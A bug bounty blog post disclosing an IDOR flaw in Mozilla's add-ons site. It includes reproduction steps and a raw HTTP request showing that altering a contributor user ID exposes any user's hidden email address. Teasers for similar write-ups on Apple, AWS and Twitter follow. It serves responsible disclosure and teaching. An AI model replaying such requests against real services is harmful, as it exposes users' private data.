Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference)

-
Company Information : 


Mozilla Firefox, or simply Firefox, is a free and open-source web browser developed by the Mozilla Foundation and its subsidiary, the Mozilla Corporation. It uses the Gecko rendering engine to display web pages, which implements current and anticipated web standards.


Bug Title : Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference)

Bug type : Indirect object reference(IDOR)

Category : Broken authentication and privilege escalation

OWASP Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

Organization : Mozilla

Web Application Link : https://addons.mozilla.org/en-US/firefox/

Steps to reproduce:

1.Go to the link : https://addons.mozilla.org/en-US/firefox/users/edit
2.Here you will get a option to hide your email address from other users.
Once you hide your email address no other user can see or get your email address associated with your account.
But there is a way we can get email address of any user.

Steps to reproduce :
1.create a collection and go to collection setting.
2.Now go to Contributor and add any valid email ID of any user.
3.Now save it and intercept this request.
HTTP request : 
POST /en-US/firefox/collections/vijaykumar1110/mypersonalcollections/edit/contributors HTTP/1.0
Host: addons.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://addons.mozilla.org/en-US/firefox/collections/vijaykumar1110/mypersonalcollections/edit/
Cookie: optimizelySegments=%7B%22245875585%22%3A%22referral%22%2C%22245617832%22%3A%22none%22%2C%22246048108%22%3A%22false%22%2C%22245677587%22%3A%22ff%22%2C%22869421433%22%3A%22true%22%2C%222000810488%22%3A%22false%22%2C%222017550344%22%3A%22ff%22%2C%221994990450%22%3A%22none%22%2C%222011280991%22%3A%22referral%22%2C%22246002457%22%3A%22referral%22%2C%22246073290%22%3A%22ff%22%2C%22245984388%22%3A%22false%22%2C%22246073289%22%3A%22none%22%7D; optimizelyEndUserId=oeu1439904202539r0.7982840573823196; optimizelyBuckets=%7B%7D; _ga=GA1.2.337997935.1439904205; __utma=164683759.337997935.1439904205.1441817471.1443040970.25; __utmz=164683759.1441743614.22.7.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); mamo=off; __utmb=164683759.14.10.1443040970; anoncsrf=Kzb5CeM039Nta0JFtMQP1lw1MNNjcu7v; __utmc=164683759; sessionid=".eJyrVkouLkqLL8nPTs1TslLKsSiuDMxMzskuLkyvKvWvsPDPD880D7LI8cgIDggysFDSUYpPLC3JiC8tTi2Kz0xRsjI0NDUwszA0QZFISkwGmgeUVQJxi_Wg_GI9x9z8UKCIE1S-FgAPyixu:1Zeqtr:ys0215LtWnbgxtF4mlF_lQ085YA"; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

csrfmiddlewaretoken=l8syQiclksqgzuOx8OoWi7R8lHhSPR08&contributor=11552132

Here POST parameter contributor is a userID of that email Address.Change this user ID to any user and his email ID will be saved in your collection.Now you can get any user's email address even his email is hidden from other users.


Actual results:

So basically this is bypassing the privacy of user's email.It's combination of IDOR and information disclosure bug.

Impact : 
1.Anyone can get the email of any user and contact him.
2.Anyone can add any user to collection and other places where you can only add users trough emailID.
There could be more critical attacks which i may not be aware of. 




Additional Video POC link : https://www.dropbox.com/s/3a6vicbgb4i8sfj/email_mozilla_IDOR.mov?dl=0


Bugzilla Report Link : https://bugzilla.mozilla.org/show_bug.cgi?id=1207807




Thanks for Reading :)














































Comments











Post a Comment




















Popular posts from this blog









Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$






-














Image







Company Information :  Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue. Bug Category :  Cross-origin resource sharing (CORS) : Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos. Stored Cross-site-scripting (XSS) : Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Impact : 1.Stealing  App Store connect API key with Full Access , Subs...








Read more










Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$






-














Image







  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws  you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...








Read more










UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)






-














Image







Company Info :  Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world.    Bug category :  Indirect Object Reference(IDOR)  Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References    Technical Details of the Bug :   Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified.    Bug Des...








Read more